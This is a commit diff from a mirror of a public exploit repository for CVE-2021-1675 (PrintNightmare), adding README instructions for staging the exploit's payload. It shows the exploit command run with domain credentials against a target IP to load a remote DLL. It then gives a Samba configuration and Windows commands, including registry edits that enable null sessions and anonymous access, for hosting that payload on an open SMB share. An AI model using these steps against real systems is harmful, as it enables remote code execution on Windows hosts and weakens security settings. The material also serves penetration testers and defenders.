mirror of
https://github.com/cube0x0/CVE-2021-1675.git
synced 2024-12-22 10:46:32 +00:00
added smb instructions
Signed-off-by: cube0x0 <vidfelt@protonmail.com>
parent
86152766a0
commit
60f0785e58
1 changed files with 34 additions and 0 deletions
34
README.md
34
README.md
|
@ -47,3 +47,37 @@ Example;
|
|||
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
|
||||
```
|
||||
|
||||
### SMB configuration
|
||||
|
||||
Easiest way to host payloads is to use samba and modify `/etc/samba/smb.conf ` to allow anonymous access
|
||||
|
||||
```
|
||||
[global]
|
||||
map to guest = Bad User
|
||||
server role = standalone server
|
||||
usershare allow guests = yes
|
||||
idmap config * : backend = tdb
|
||||
smb ports = 445
|
||||
|
||||
[smb]
|
||||
comment = Samba
|
||||
path = /tmp/
|
||||
guest ok = yes
|
||||
read only = no
|
||||
browsable = yes
|
||||
force user = smbuser
|
||||
```
|
||||
|
||||
From windows it's also possible
|
||||
|
||||
```
|
||||
mkdir C:\share
|
||||
icacls C:\share\ /T /grant Anonymous` logon:r
|
||||
icacls C:\share\ /T /grant Everyone:r
|
||||
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
|
||||
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
|
||||
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
|
||||
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
|
||||
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
|
||||
```
|
||||
|
||||
|
|